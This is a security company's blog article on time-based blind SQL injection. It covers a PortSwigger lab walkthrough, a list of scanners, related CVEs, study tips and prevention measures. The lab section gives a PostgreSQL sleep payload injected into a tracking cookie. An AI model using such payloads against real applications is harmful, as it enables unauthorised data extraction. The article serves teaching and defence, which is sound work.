22 Фев, 2024

Blind SQL injection with time delays

Blind SQL injection with time delays is a sophisticated exploitation technique that targets vulnerabilities in an application’s SQL database interaction. This method is employed when the attacker cannot directly view the outcome of a SQL query but can infer the result based on the time the database takes to respond. In a blind SQL injection attack, the attacker crafts SQL queries that cause the database to perform an action that visibly affects the response time. For instance, the attacker might design a query that, if true, forces the database to wait for a specified amount of time before responding. By measuring the delay in the response, the attacker can deduce information about the database structure, such as table names, column names, and even specific data stored in the database.

This technique relies on sending numerous requests to the server, each designed to test a specific condition in the database. The time delay is usually achieved by using SQL commands like SLEEP(), WAITFOR DELAY, or similar functions supported by the database management system. The attacker incrementally builds successful queries to extract data, character by character or bit by bit, based on the presence or absence of the induced delay.

The use of time delays in blind SQL injection attacks makes them more discreet and harder to detect compared to other types of SQL injection attacks because they do not rely on error messages or direct data leakage. However, they are time-consuming and generate a significant amount of traffic, which might raise suspicions.

Примеры эксплуатации

To show how the vulnerability is exploited we will use a lab from PortSwigger. This lab involves a vulnerability for blind SQL injection with time delays. The application uses cookies for analytics and executes an SQL query containing the value of the cookie provided.

The results of the SQL query are not returned, and the application does not respond differently depending on whether the query returns any rows or raises an error. However, because the query is executed asynchronously, it is possible to cause conditional time delays to retrieve the information.

To solve this lab, we need to exploit a SQL injection vulnerability to cause a 10 second delay.

Let’s just refresh the page and intercept this request with Burp.

For convenience, I will move this query to Repeater.

For convenience, I will move this query to Repeater. Let’s turn our attention to cookies, namely to the TrackingId parameter, let’s try to test our payloads in it. I will use the SQL injection cheat sheet from Portswigger themselves to select the command.

Let’s use the information from the cheat sheet and try the payload in this form ‘ || pg_sleep(5)– (This payload is only suitable for PostgreSQL).

Scanners that detect vulnerabilities

  1. SQLMap – This is an extremely popular open-source tool that automates the detection and exploitation of SQL injection issues. It has a powerful detection engine and offers a wide range of switches that include database fingerprinting, data fetching, and access to the underlying file system.

  2. OWASP Zed Attack Proxy (ZAP) – This is a leading open-source tool maintained by the Open Web Application Security Project (OWASP). It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to ПЕНТЕСТ.

  3. Acunetix – A fully-featured commercial automated web application security scanner that scans HTML5, JavaScript, and single-page applications. It can audit complex, authenticated web apps and issues compliance and management reports on a wide range of web and network vulnerabilities.

  4. Netsparker – This scanner stands out with its Proof-Based Scanning™ technology. It’s a fully automated tool that can identify vulnerabilities in HTML5, JavaScript and any type of web application. It also provides a unique proof of exploit to confirm the identified vulnerability.

  5. Burp Suite – Offered by PortSwigger, it is a comprehensive solution for web application security checks. In addition to a powerful scanner, it features an intruder tool, a repeater tool, a sequencer tool, and more. It is particularly well-regarded for its proxy tool that allows the analyst to review and manipulate traffic between the browser and the target application manually.

  6. Nmap with NSE Scripts – Nmap is primarily known as a network discovery and security auditing tool. Its scriptable engine has scripts that can detect vulnerabilities, including SQL injections. It’s a versatile tool that can be used for a wide range of security tasks.

  7. Nikto – This is an open-source web server scanner which is capable of scanning and detecting thousands of vulnerabilities on any web server. It is updated frequently and integrates well with other tools like Metasploit and Burp Suite.

  8. WebInspect – A comprehensive dynamic application security testing tool designed by Micro Focus that simulates real-world attacks to provide a detailed analysis of complex web applications and services. It offers a broad range of service-level and application-level assessments.

  9. AppScan – IBM’s AppScan enhances web application security and mobile application security, improves application security program management and strengthens regulatory compliance. By scanning your web and mobile applications prior to deployment, it identifies security vulnerabilities and generates reports and fix recommendations.

  10. w3af – This is a web application attack and audit framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. It has both a graphical and command-line interface and is noted for its ease of use.Пентест

Average CVSS score for Blind SQL injection with time delays

The Common Vulnerability Scoring System (CVSS) provides a way to capture the principal characteristics of a vulnerability and produce a numerical score reflecting its severity. The numerical score can then be translated into a qualitative representation (such as low, medium, high, and critical) to help organizations properly assess and prioritize their vulnerability management processes.

For Blind SQL Injection with time delays, the severity can vary depending on the specific circumstances of the vulnerability, such as the potential impact on the affected system and the complexity of exploiting the vulnerability. However, Blind SQL Injection vulnerabilities are often rated as high or critical due to the potential for an attacker to illicitly retrieve sensitive data from the database, bypass authentication, or even carry out administrative operations on the database.

While the average CVSS score for Blind SQL Injection vulnerabilities might generally fall into the high severity category (with scores typically between 7.0 to 10.0), it’s important to note that each vulnerability must be assessed individually. Factors such as the confidentiality, integrity, and availability impact, as well as the ease of exploit and required privileges, will influence the final CVSS score.

CVES related to Blind SQL injection with time delays

CVE-2021-24295: This vulnerability was found in the Piraeus Bank WooCommerce Payment Gateway plugin for WordPress. It is susceptible to time-based blind SQL Injection via the ‘MerchantReference’ parameter.

CVE-2021-43969: The login.jsp page of Quicklert for Digium 10.0.0 (1043) suffered from Blind SQL Injection with Out-of-Band Interaction (DNS) and Blind Time-Based SQL Injections, affecting the uname parameter in the login.jsp.

CVE-2019-9053: CMS Made Simple 2.2.8 had an issue in the News module, where a crafted URL could lead to unauthenticated blind time-based SQL injection via the m1_idlist parameter.

CVE-2023-6921: The PrestaShow Google Integrator (PrestaShop addon) had a Blind SQL Injection vulnerability that allowed for data extraction and modification via command insertion in one of the cookies.

CVE-2022-28111: MyBatis PageHelper contained a time-blind SQL injection vulnerability via the orderBy parameter.

To study Blind SQL injection with time delays

Theoretical Understanding

  1. Familiarize yourself with SQL syntax, database structure, and the functions of various SQL statements.

  2. Learn about what SQL Injection is, including its types and how it can be exploited by attackers.

  3. Understand the specific strategies used in Blind SQL Injection, where the results of a SQL query are inferred from the behavior of the application rather than displayed directly.

  4. Study how time delays can be introduced into SQL queries and how these can be used to infer information about the database when direct data retrieval is not possible.

Practical Skills

  1. Create a safe, legal environment for practicing your skills. This could be a local setup with vulnerable applications like DVWA (Damn Vulnerable Web Application) or using platforms like Взломайте Коробку или Академия веб - безопасности PortSwigger that provide legal avenues for practicing.

  2. Get hands-on experience with tools like SQLMap, which can automate the process of detecting and exploiting SQL injection vulnerabilities, including time-based SQL injection.

  3. Learn to craft SQL injection payloads manually to understand the underlying process. This usually involves using SQL functions that cause delays (e.g., SLEEP, WAITFOR DELAY) conditionally to extract information.

  4. Use network interception tools like Wireshark or Burp Suite to analyze traffic and understand how payloads affect database behavior.

  5. Familiarize yourself with frameworks like Metasploit that have modules for exploiting SQL injection vulnerabilities.

Advanced Topics

  1. Study how to bypass filters and security measures that might be in place to prevent SQL injection.

  2. Understand security practices that can prevent SQL injection, such as the use of prepared statements, parameterized queries, and ORM frameworks.

  3. Learn how to conduct security audits to identify SQL injection vulnerabilities in applications.

How to be protected from Blind SQL injection with time delays

  1. This is the most effective way to prevent SQL injection. Using prepared statements ensures that user input is not treated as part of the SQL query logic but merely as data. In many programming languages, this can be achieved with PDO (PHP Data Objects), Java Prepared Statements, and similar mechanisms in other languages.

  2. Properly written stored procedures can encapsulate the SQL logic and automatically treat input parameters as data, not executable code. However, care must be taken to avoid dynamically constructing SQL within the stored procedures, which can still be vulnerable.

  3. Validate user input against a set of allowed characters. For instance, if you expect a numerical input, ensure that the data received is numeric.

  4. If prepared statements are not possible, you should carefully escape special characters using the specific escape function for your database, such as mysql_real_escape_string() for MySQL, pg_escape_string() for PostgreSQL, etc.

  5. A WAF can help identify and block SQL injection attacks, including blind SQL injections, by filtering out malicious data based on patterns and heuristics.

  6. Ensure that the database user used by the web application has the least privileges necessary. Restricting the database account to only the actions that are necessary for the application can minimize the potential impact of a SQL injection flaw.

  7. Customize error messages to avoid revealing any information about the database structure. Generic error messages should be shown to users, while detailed logs should be kept on the server side for debugging by trusted personnel only.

  8. Keep your database management system (DBMS) and all your applications up to date with the latest patches. Many DBMS updates include security enhancements to prevent SQL injection.

  9. Regularly perform security testing, including both static code analysis (SAST) and dynamic application testing (DAST). This can help identify potential injection flaws before they are exploited.

  10. Disable any database functionality that is not explicitly needed for your application. For example, if your app doesn’t need to make use of SQL’s DELAY functions, they should be disabled.

  11. Implement a monitoring system that detects unusual database activity, such as an unexpected increase in database load or anomalous application behavior, which could indicate a time-based SQL injection attempt.

  12. Have an incident response plan in place so that your team knows how to quickly react if a SQL injection is detected.


In conclusion, Blind SQL Injection with time delays represents a sophisticated security threat that exploits vulnerabilities in web applications’ interaction with databases. This article has underscored the importance of understanding both the theoretical and practical aspects of such attacks to better prepare for and mitigate potential breaches.

We’ve discussed the nature of Blind SQL Injection, its reliance on the consequential delay in database response, and the importance of detecting such vulnerabilities using specialized scanners. A range of tools was highlighted, including SQLMap, OWASP ZAP, Acunetix, and others, each offering unique features for identifying and exploiting SQL injection flaws.

Furthermore, we’ve delved into the means of protection against these insidious attacks. Emphasizing prepared statements, stored procedures, strict input validation, least privilege principles, error handling, and the use of Web Application Firewalls (WAFs) as critical defenses. Regular security testing, patching, and having an incident response plan were also established as best practices.

Другие Услуги

Готовы к безопасности?

Связаться с нами